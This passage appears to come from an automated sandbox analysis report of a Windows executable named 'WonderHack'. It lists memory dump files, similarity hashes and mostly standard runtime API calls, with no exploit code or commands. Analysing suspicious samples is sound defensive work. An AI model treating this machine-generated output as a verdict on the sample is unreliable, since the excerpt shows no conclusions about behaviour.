• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d541e2e0d0a3c44f12ace1ce15b3c729264545327d71a974626022d0c407c29
• Instruction ID: 3aa8874d493aebe0d8cdc571d17dd62c40ece73713407a0000f69f62a4b6ec41
• Opcode Fuzzy Hash: 5d541e2e0d0a3c44f12ace1ce15b3c729264545327d71a974626022d0c407c29
• Instruction Fuzzy Hash: 20B10370A04249AFDF11DFA9D8C1BFD7BB4BF4A304F148159E411AB2A2C7709E42DBA5
APIs
• GetLastError.KERNEL32(?,?,00CB1FA5,00CA7361,00CA6681), ref: 00CB1FBC
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CB1FCA
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB1FE3
• SetLastError.KERNEL32(00000000,00CB1FA5,00CA7361,00CA6681), ref: 00CB2035
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 80c2a5f3b6dc901653dc783c2414e50e2c0e34a00814ea4153bc059e75d3149f
• Instruction ID: 16268a4d98560addcad5b3924d488a29237a28da832a10044f9f7982ffa9aa2f
• Opcode Fuzzy Hash: 80c2a5f3b6dc901653dc783c2414e50e2c0e34a00814ea4153bc059e75d3149f
• Instruction Fuzzy Hash: EF01753620B2115DA6253AB9BC95BAF2B44DB557B4F30063BF531550F3EF924D01E650
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00CB2945
• CallUnexpected.LIBVCRUNTIME ref: 00CB2BBE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2673424686-393685449
• Opcode ID: c8d4beee907e8170ada37494431021fa945333dd8470a078108e8985c8686446
• Instruction ID: 81fbed23a90a42b7728e09d652b2356f91e1b0d6e0d718a4227d4c3a0cb83789
• Opcode Fuzzy Hash: c8d4beee907e8170ada37494431021fa945333dd8470a078108e8985c8686446
• Instruction Fuzzy Hash: 34B18931C00209EFCF29DFA4D881AEEBBB5FF18310F54455AE8256B212C735DA52DBA1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0BDF5ED4,?,?,00000000,00CC3374,000000FF,?,00CACAFD,00CAC9E4,?,00CACB99,00000000), ref: 00CACA71
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CACA83
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CC3374,000000FF,?,00CACAFD,00CAC9E4,?,00CACB99,00000000), ref: 00CACAA5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 849f90581f4b6ae1d7a4c255533e66c7c4c04dcbd33a241b56b59775bcad8077
• Instruction ID: 0945756f8fb3b59626037b0620e5d3766089cdd3c50205cdfd92706916ec2fe0
• Opcode Fuzzy Hash: 849f90581f4b6ae1d7a4c255533e66c7c4c04dcbd33a241b56b59775bcad8077
• Instruction Fuzzy Hash: BC01673150465AAFDB11DF94DC09FBEBBB8FB05714F044539F826A22E0DB74AD00CA90
APIs
• __alloca_probe_16.LIBCMT ref: 00CB4952
• __alloca_probe_16.LIBCMT ref: 00CB4A1B
• __freea.LIBCMT ref: 00CB4A82
  • Part of subcall function 00CB31C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CA22A9,?,?,00C93E32,00001000,?,00C93D7A), ref: 00CB31F3
• __freea.LIBCMT ref: 00CB4A95
• __freea.LIBCMT ref: 00CB4AA2
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: dd72112742775c50dd7fdfab8af549708399a61af1b39a70069cbf04af6302ef
• Instruction ID: 084d6ef5fcf4fa903f3d648275981199b77317045209f5dc7469928d26e230c3
• Opcode Fuzzy Hash: dd72112742775c50dd7fdfab8af549708399a61af1b39a70069cbf04af6302ef
• Instruction Fuzzy Hash: FE51CE72644207AFEF289FA58C85EFB3BADEF84710F194528FD14D6142EB30DE10A664
APIs
• GetCurrentThreadId.KERNEL32 ref: 00CA5C93
• AcquireSRWLockExclusive.KERNEL32(?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5CB2
• AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5CE0
• TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5D3B
• TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00CA5C5C,?,00000000,?,00C9B93C,?,?,00C9D94E), ref: 00CA5D52
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID:
• API String ID: 66001078-0
• Opcode ID: 6ab3ec893ad4a3cd477eebc6971b9c9ee9778856840928466a047a899c0b406d
• Instruction ID: 760ee6a283a87abb48f606f530e65e698fadcdc7daebdc6234ae0a0269dd4001
• Opcode Fuzzy Hash: 6ab3ec893ad4a3cd477eebc6971b9c9ee9778856840928466a047a899c0b406d
• Instruction Fuzzy Hash: B1413C75900F0BDFCB20DF65D688AAAB7F4FF06318B50892AD466D7650D730EA85CB50
APIs
• __EH_prolog3.LIBCMT ref: 00CA295D
• std::_Lockit::_Lockit.LIBCPMT ref: 00CA2968
• std::_Lockit::~_Lockit.LIBCPMT ref: 00CA29D6
  • Part of subcall function 00CA285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00CA2877
• std::locale::_Setgloballocale.LIBCPMT ref: 00CA2983
• _Yarn.LIBCPMT ref: 00CA2999
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                          • Opcode ID: f187d5fb47a2de2ade0712da6309badfcd6dbab3dbee40a211992b1d8c9e1b84
                                                                                                                                                                                                                                                                          • Instruction ID: 956188fe66ed6912929ccf440cc25b8b8e44e64e4a49d7e921db6e7a66d633a6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f187d5fb47a2de2ade0712da6309badfcd6dbab3dbee40a211992b1d8c9e1b84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8018F75A016229BCB06EF24D845B7E7BB2FF86758B18401DF81197391CF34AE02EB95
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CBDDCD,00000000,?,00CD21B8,?,?,?,00CBDD04,00000004,InitializeCriticalSectionEx,00CC808C,00CC8094), ref: 00CBDD3E
• GetLastError.KERNEL32(?,00CBDDCD,00000000,?,00CD21B8,?,?,?,00CBDD04,00000004,InitializeCriticalSectionEx,00CC808C,00CC8094,00000000,?,00CB2E6C), ref: 00CBDD48
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CBDD70
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: e983bf86b4b9245f0bf0cd7b85a8838826739da621f19149f5795613feb8ca25
• Instruction ID: 6ed15c957997e20fb58fe9c7a97230ee9d2186fcedca4a0b6c71a0dad968491a
• Opcode Fuzzy Hash: e983bf86b4b9245f0bf0cd7b85a8838826739da621f19149f5795613feb8ca25
• Instruction Fuzzy Hash: 34E04F70380605B7EB111B71EC06FAD3B54AF20B41F144570F94EE80E1FB72A9209994
APIs
• GetConsoleOutputCP.KERNEL32(0BDF5ED4,00000000,00000000,?), ref: 00CBB13A
  • Part of subcall function 00CB32D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CB4A78,?,00000000,-00000008), ref: 00CB3332
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CBB38C
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CBB3D2
• GetLastError.KERNEL32 ref: 00CBB475
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: 8d7c6606defa84f09475a25a421d05c5945c8dbd13664f12654422df8254fa04
• Instruction ID: eeb3c62fad7615f9a22a415389832958dc9136c7102e91aa29c0de28da6c94cb
• Opcode Fuzzy Hash: 8d7c6606defa84f09475a25a421d05c5945c8dbd13664f12654422df8254fa04
• Instruction Fuzzy Hash: 57D179B5D012489FCB15CFA8D890AEDBBB4FF49304F28412AE466EB252D770AD42CF50
APIs
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: 2617fc9c27c156e4c1ef752bca1ac778108844306f2cb599730e1a8cc4f7a2f6
• Instruction ID: 7f91b2d7799428d179dceba928d2a92b58d5b4092e08265aafb67d176b5565cf
• Opcode Fuzzy Hash: 2617fc9c27c156e4c1ef752bca1ac778108844306f2cb599730e1a8cc4f7a2f6
• Instruction Fuzzy Hash: 77510172A01206AFDB288F55D840BEAB3B4FF45714F15052EFC218B2A1E731EE44DB90
APIs
  • Part of subcall function 00CB32D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CB4A78,?,00000000,-00000008), ref: 00CB3332
• GetLastError.KERNEL32 ref: 00CB8F67
• __dosmaperr.LIBCMT ref: 00CB8F6E
• GetLastError.KERNEL32 ref: 00CB8FA8
• __dosmaperr.LIBCMT ref: 00CB8FAF
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 3b4889989c7e3f0d14fc68726bfc6eb1cbb01dda3c33cfce60bded43b1224da3
• Instruction ID: fd60558959eada20932296fcfb284893c1e241f90453f7bc61be7f857e259db1
• Opcode Fuzzy Hash: 3b4889989c7e3f0d14fc68726bfc6eb1cbb01dda3c33cfce60bded43b1224da3
• Instruction Fuzzy Hash: E921A771604216AFDB10AFA2D8859BBB7AEFF15364B108519F82997190DF30EE04DFA0
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c510a800906c06031ebd754848f6284b5059810e4a930456c61226414f3b4ca
• Instruction ID: ca86ea10f85606cb7b42c6cc43ae820441b0fd665492ae6e7966b5c670b4c97a
• Opcode Fuzzy Hash: 4c510a800906c06031ebd754848f6284b5059810e4a930456c61226414f3b4ca
• Instruction Fuzzy Hash: AD218731200217AFDB10AF66DC86DAA77ADFF4336CB104524F926D7691E734ED109BA0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00CBA301
  • Part of subcall function 00CB32D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CB4A78,?,00000000,-00000008), ref: 00CB3332
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBA339
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBA359
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: a50271fc9c27b77633ee039633b90e4aca2c9a73d053798de6565b381c0ade01
• Instruction ID: e11625725e499e9452c65c99758fb5bb229f931b73f56c6c125f4cb55ada83c0
• Opcode Fuzzy Hash: a50271fc9c27b77633ee039633b90e4aca2c9a73d053798de6565b381c0ade01
• Instruction Fuzzy Hash: 4A11D2F5A012557FA71237BA9C8DDEF2ADCEE843A9F500124F846D2151FA24DF0192B6
APIs
• __EH_prolog3.LIBCMT ref: 00CA43A0
• std::_Lockit::_Lockit.LIBCPMT ref: 00CA43AA
  • Part of subcall function 00C94D90: std::_Lockit::_Lockit.LIBCPMT ref: 00C94DBE
  • Part of subcall function 00C94D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00C94DE9
• codecvt.LIBCPMT ref: 00CA43E4
• std::_Lockit::~_Lockit.LIBCPMT ref: 00CA441B
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
• Opcode ID: f6a379e71117806fb4d3a527d5420214101fbd5f0c73c85a224ac740a36c27f9
• Instruction ID: f86c7fcb18d4493f9a778e2045c287080afe2e820abc1ad766d9b40c5b15c21d
• Opcode Fuzzy Hash: f6a379e71117806fb4d3a527d5420214101fbd5f0c73c85a224ac740a36c27f9
• Instruction Fuzzy Hash: 1F01967590112A9BCF09EB64D905BBDB771AF85319F294519F410A7291CF709E01E790
APIs
• WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000), ref: 00CC21F7
• GetLastError.KERNEL32(?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000,?,?,?,00CBAE0F,?), ref: 00CC2203
  • Part of subcall function 00CC2254: CloseHandle.KERNEL32(FFFFFFFE,00CC2213,?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000,?,?), ref: 00CC2264
• ___initconout.LIBCMT ref: 00CC2213
  • Part of subcall function 00CC2235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CC21D1,00CC16BC,?,?,00CBB4C9,?,00000000,00000000,?), ref: 00CC2248
• WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00CC16CF,00000000,00000001,?,?,?,00CBB4C9,?,00000000,00000000,?), ref: 00CC2228
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: cd0fd5e88a7d51c19a32a91ead1180a647d04bb50d8f346b20e905b950ec2373
• Instruction ID: dbd1b987e27596b66e975ab0461cb77d0ddc62894e8d74a24f4a276026f588bb
• Opcode Fuzzy Hash: cd0fd5e88a7d51c19a32a91ead1180a647d04bb50d8f346b20e905b950ec2373
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AF0AC36511115BBCF262FD5DC08F9E7F66FB493B1B054125FE1995120DB728920AB90
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CAD04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CB7BA2
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CAD04D,?,?,?,00000055,?,-00000050,?,?), ref: 00CB7BD9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast$CodePageValid
• String ID: utf8
• API String ID: 943130320-905460609
• Opcode ID: 3d664294a0b12362cefb849289553384bfd306dbd5dfeba46acbedefe3b9e28a
• Instruction ID: 7235ab547f55b26cb7cfff21ae6810aaf4d7be8c44baf592d6404ec88a201ae1
• Opcode Fuzzy Hash: 3d664294a0b12362cefb849289553384bfd306dbd5dfeba46acbedefe3b9e28a
• Instruction Fuzzy Hash: 32510531608315ABDB25AB74CC42FEA77A8EFC4700F10066DFD259B181FA70EA40DBA5
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CB2B4B,?,?,00000000,00000000,00000000,?), ref: 00CB2C6F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 8da995c2297eef3582e997dc565ef46bb3e8f9b5d48b52ebc39423080c88fd66
• Instruction ID: e5669d1c34dc4327cb8b316301bb0be1ae35ee52ccb07143ce4e5bef3f6b82cd
• Opcode Fuzzy Hash: 8da995c2297eef3582e997dc565ef46bb3e8f9b5d48b52ebc39423080c88fd66
• Instruction Fuzzy Hash: 32416972900209AFDF26DFA8CD81AEEBBB5FF48304F188199F914A7221D3359A50DB51
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 00CB272D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814
• Opcode ID: 77a5cfb530ea8ae895fd61f6bf0a53aa88d10fb72eb5e9eb1e27165186a66308
• Instruction ID: c9ee65b74c312f3727477516dc28cc0989aebadad4745b2e82db0aa91d55bc03
• Opcode Fuzzy Hash: 77a5cfb530ea8ae895fd61f6bf0a53aa88d10fb72eb5e9eb1e27165186a66308
• Instruction Fuzzy Hash: A331D136400219ABCF268F50CC459EABB66FF18715F18855AFC64591A1C733CEA2EBD1
APIs
• __alloca_probe_16.LIBCMT ref: 00CA3114
• RaiseException.KERNEL32(?,?,?,?), ref: 00CA3139
  • Part of subcall function 00CA7223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00CA5F93,?,?,?,?,00CA5F93,00001000,00CCE1AC,00001000), ref: 00CA7284
  • Part of subcall function 00CAF7B9: IsProcessorFeaturePresent.KERNEL32(00000017,00CAA37B,?,?,?,?,00000000), ref: 00CAF7D5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
• String ID: csm
• API String ID: 1924019822-1018135373
